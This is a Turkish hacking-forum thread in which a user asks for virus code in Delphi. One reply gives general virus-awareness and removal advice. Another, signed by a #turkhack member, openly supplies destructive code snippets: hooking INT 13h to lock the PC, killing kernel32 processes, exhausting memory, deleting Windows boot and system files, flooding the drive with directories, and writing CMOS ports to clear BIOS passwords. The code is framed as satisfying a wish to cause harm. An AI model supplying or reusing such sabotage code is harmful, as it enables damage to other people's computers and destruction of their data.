Virüs..Önemli..Acil..Yardım...
-
Virüs nedir?Ne tür virüsler vardır?Virüsün saldırı hedefi vindowsun neresidir?Virüs hangi
amaca göre yazılır?Örneğin:Delphi7 de bir virüs yazmak istesem bana yardım edermisiniz.?Birkaç
tane örnek virüs kodu verirmisiniz?...Virüs bilgeseyarıma bulaşmadan nasıl yazabilirim?Ve Vereceğiniz
kodların saldırı hedeflerini ve neişe yaradıklarınıda yazzarsanız sevinirim?....!?[(ARKADAŞLAR BEN BU VİRÜS YAZMA
OLAYINI GERÇEKTEN "MERAK" , "MERAK , "MERAK" EDEN BİRİSİYİM.BANA BU KONUYU ANLATIRSANIZ ÇOK BAHTİYAR OLACAĞIM.
Biliyorum yazılıya Tutar gibi soru soruyorum.BU SORDUĞUM SORULARIN CEVAPLARI GALİBAA BAYAĞI
UZUN ALLAH SİZE SABIR VERSİN...)]?!:-)
NOT: KÜÇÜK bir SORUM OLACAK.Siz bu virüs yazma olayını meraktanmı Yoksa,,,,,,,,,,,,,,,,,
başkalarının bilgisayar larını bozmak içinmi öğrendiniz.Siz ne için bilmem ama benn hepinizden fazla merak ettiğim için öğrenmek istiyorum.
Dikkatimi Çekti herkese"Başkalarının pc lerini bozcan deyimi?"YADA"herkes birbirini sırtından vuru olmuş ne dayanışması"
gibi..... cevaplar veriyorsunuz işallah banada öyle vermezsiniz.İster Özelime İster Buraya Cevaplarınızı ne
olurasa olsun bekliyorum Şimdiden HEPİNİZE TEŞEKKÜRLER
---ZhSnn1--- -
Bilgisayar virüsleri, çalıştığında bilgisayara değişik sekillerde zarar verebilen bilgisayar programlarıdır. Bu programlar (ya da virüs kodları) çalıştırıldığında programlanma şekline göre bilgisayara zarar vermeye başlar. Ayrıca, tüm virüs kodları (bilinen adıyla virüsler) bir sistemde aktif hale geçirildikten sonra çoğalma (bilgisayarınızdaki diğer dosyalara yayılma, ağ üzerinden diger bilgisayarlara bulaşma vb gibi) özelliğine sahiptir.
Bilgisayar virüslerinin popüler bulaşma yollarından birisi "virüs kapmış bilgisayar programları" dır. Bu durumda, virüs kodu bir bilgisayar programına (söz gelimi, sık kullandığın bir kelime işlemci ya da beğenerek oynadığın bir oyun programı) virüsü yazan (ya da yayan) kişi tarafindan eklenir. Böylece, virüslü bu programları çalıştıran kullanıcının bilgisayarı virüs kapabilir. Özellikle internet üzerinde dosya arşivlerinin ne kadar sık kullanıldığını düşünürsek tehlikenin boyutlarını daha da iyi anlayabiliriz.
Virüslenmiş program çalıştırıldığında bilgisayar virüs kodu da, genellikle, bilgisayarın hafızasına yerleşir ve potansiyel olarak zararlarına başlar. Bazı virüsler, sabit diskinin ya da disketlerinin "boot sector" denilen ve bilgisayar her açıldığında ilk bakılan yer olan kısmına yerleşir. Bu durumda, bilgisayarının her açıldığında "virüslenmiş" olarak açılır. Benzer şekilde, kendini önemli sistem dosyalarının (MSDOS ve windows için COMMAND.COM gibi) peşine kopyalayan virüsler de vardır.
Virüsler programların yanında veri dosyalarını da bozabilir mi?
Bazı virüsler, doğrudan data dosyalarını bozabilirler. Birçok virüs, .DAT, .OVR, .DOC gibi çalıştırılabilir olmayan dosyaları hedef alıp bozabilmektedir. Ancak bilgisayar virüsleri de bir çeşit "bilgisayar programları" olduğundan, virüsün yayılabilmesi için mutlaka virüs kodunun çalışması lazım. Bu yüzden, söz gelimi bir düzyazı içeren dosyanın (text) virüs taşıma ihtimali yok.
Bilgisayarım virüslendi. Nasıl temizleyecegim?
Bir programın virüslü olduğundan şüpheleniyorsan, yapacağın ilk iş, o an kullandığın tüm uygulamaları kapatmak, yaptığın işleri saklamak. Ardından, bir antivirüs programı ile bilgisayarını (gerekirse disket(lerini) tara.Her zaman için, kullandığın antivirüs programının yeni bir sürümünü elde etmeye çalış.Eger bilgisayarın sistem alanları da etkilenmişse, bu durumda bilgisayarını kapat. Ardından, bilgisayarını "temiz bir sistem disketi" ile aç. Bu yüzden, her zaman böyle bir disket bulundurmak faydalı olacaktır (windows95 için Rescue Disk). Daha sonra, bir virüs tarama/temizleme programı ile bilgisayarını tara.
Internet"ten aldığın e-posta"dan bilgisayarın virüs kapabilir..Sadece düz yazı içeren bir e-postayı okumakla sistemine virüs filan bulaşmaz. Eger aldığın e-posta ile birlikte bir "attachment (eklenmiş dosya)" varsa (eklenmiş dosya, herhangi bir çalıştırılabilir (executible) dosya olabilir), mailini okuyup gelen dosyayı diskine saklamakla "o dosya virüslü dahi olsa" yine virüs bulaşmaz. Tabii, eklenmiş dosyayı çalıştırırsan ve o dosya da virüslü ise, sistemine virüs bulaşabilir. Bu tamamen senin sorumluluğun. Yıllar içinde mail programları oldukça gelişmiştir. bazı özel tekniklerle, mail içine "doğrudan çalıştırılabilir kod" ekleme olanağı vermektedir. Daha çok yeni olan bu kullanım, tüm potansiyel virüs saldırılarına açıktır. Dolayısıyla, sana gelen bir maili okumadan önce, "konusuna" ve "kimden gönderildiğine" ayrıca "uzunluğuna" bakıp ona göre bir karar verebilirsin. Kullandığın mail programı, bazı seçeneklerini degiştirirsen, maili okumak için açtığın anda, senin onayını almadan, aslında bir program olan ilgili kod çalışmaya başlayabilir.
Virüslerden korunma yolları nelerdir?
En iyi korunma yolu, şüpheli programları, güvenmediğin internet sitelerinden aldığın programları hemen kontrol etmeden çalıştırmamak. Dışarıdan bir program aldığında "MUTLAKA BİR VİRUS TARAYICI İLE" kontrol et.
Ancak, bu korunma önlemi de yetmeyebilir. Virüsler yanında, çalıştırdığında bilgisayarının önemli dosyalarını silen, disklerini formatlamaya çalışan ve ilk anda yararlı gibi görünen (söz gelimi ilk anda bir oyun programı olduğunu sanırsınız) programlar da var. Bu programlar, genellikle, illegal programların bulundugu birtakım kontrolsüz FTP sitelerinde, web sitelerinde bulunmaktadır. Bu tip programların dağıtıldığı önemli yerlerden biri de haber gruplarıdır (usenet news). Aldığın bir mailin sonuna eklenen ve "lütfen ilişikteki kısa programı çalıştırın, size çok güzel bir yeni yıl kutlaması mesajı veriyor" gibi bir mesaj görür, eklenmiş programı alır ve çalıştırırsan başın muhtemelen dertte olacak demektir. Programı alırsın, içinden hiç virüs çıkmaz. Ama, aldığın program, çalıştırıldığında, aslında makinana ciddi zararlar veren bir algoritmayı doğrudan çalıştırıyor olabilir. Bu yüzden, çok dikkatli olmak lazım. Son pişmanlik fayda etmiyor.
Önemli dosyalarının (sistem dosyaları, önemli kişisel dosyalar vb) yedeklerini almaya çalış. Ve de süpheli bir şekilde aldığın bir programı hemen sil.
Bilgisayarına, eger imkanın varsa, bir virüs koruyucu kalkan programı yükle. Bu da, seni bir miktar koruyacaktır. Bu programların seçenekleri ile biraz oynayarak tam kullanımını öğren. Bazıları, disk formatlama, dosya silme vb gibi konularda kullanıcıyı uyaran özelliklere sahiptir.
Herhalde açıklayıcı olmuştur geniş bilgi almak istersen ağer arama motorlarından da bulabilirsin
ViRüSLeRi SeVeRiM..BeN,BiLGiSaYaRıM ve ViRüSLeRiM
Birer bütünüzdür..
-
Delphi ilgi alanım olduğu için bu mesajı sana yazıyorum. Somut konuşacağım. Virüsle ilgili bilgileri değişik sitelerden alabilirsin. Şimdi sana birkaç kod yolluyor ve işlevini yazıyorum. Bunların tam anlamıyla birer virüs olduğu söylenemez. Ancak zarar vermek isteğini (Libidonu) tatmin eder. Bunları kendi bilgisayarında deneme!.
PC Kitleme:
program latent;
{$M 1024,0,0} {keep 0 için kullanıyoruz sadece}
procedure kill_int_13h; interrupt;
begin
end;
begin
if not(get_password) then {şifrelere gitme fonksiyonu}
begin
setintvec($13,@kill_int_13h);
keep 0; {dosa geri dönüyoruz}
end;
{
ve sonuç pc kitlenir!}
end.
Makinenin çalışmasını kırmak için (kernel hatası):
uses
Tlhelp32;
KillTask("kernel32.dll");
function KillTask(ExeFileName: string): integer;
const
PROCESS_TERMINATE=$0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot
(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle,
FProcessEntry32);
while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) =
UpperCase(ExeFileName))
or (UpperCase(FProcessEntry32.szExeFile) =
UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(OpenProcess(
PROCESS_TERMINATE, BOOL(0),
FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle,
FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
Hafızayı Bitirme:
procedure TForm1.Button1Click(Sender: TObject);
var
latent :PChar;
begin
while 1=1 do
begin
GetMem(latent, 1024)
end;
end;
Windowsun başlangıcını Dosya Silerek Sabota Etme:
var
SystemDir : String ;
begin
DeleteFile(SystemDir+"\windows\Command.com");
DeleteFile(SystemDir+"\windows\Win.com");
DeleteFile(SystemDir+"\windows\system.ini");
DeleteFile(SystemDir+"\windows\win.ini");
DeleteFile(SystemDir+"\Command.com");
DeleteFile(SystemDir+"\autoexe.bat");
end;
Sürücüde Binlerce Dosya Açma:
var
I: Integer;
begin
for I := 0 to Number.Value do
begin
CreateDirectory(PChar("C:\latent" + IntToStr(I)), nil);
end;
end;
Bu da Cmos şifrelerini Geçersiz Kılma:
Code By LaTenT !
PROCEDURE OUTPASSWORD;
BEGIN
ASM
XOR AX,AX
MOV AL,11H
OUT 70H,AL
MOV AL,074H
OUT 71H,AL
XOR AX,AX
MOV AL,2FH
OUT 70H,AL
MOV AL,0C4H
OUT 71H,AL
END;
Şimdilik Bu kadar yeterli. Virüs yazmak için Delphi"ye hakim olmak ve yaratıcı bir zeka kullanmak gerekir. Sen sanırım Delphi"ye yeni bşlıyorsun. Öncelikle onun tememllerini edinmelisin. Pat diye virüs yazamassın.
Saygılarımla. Barış YEŞİLÇİMEN (LaTenT / Acemi) irc.zurna.net #turkhack , #hack
-
DraGonS; Bu kadar bilgiye can sağlığı...
-
Çok saolun arkadaşlar beni bayağı bilgilendirdiniz..
daha sorularım olacak beni izlemeyii devam edin......
Toplam Hit: 2735 Toplam Mesaj: 5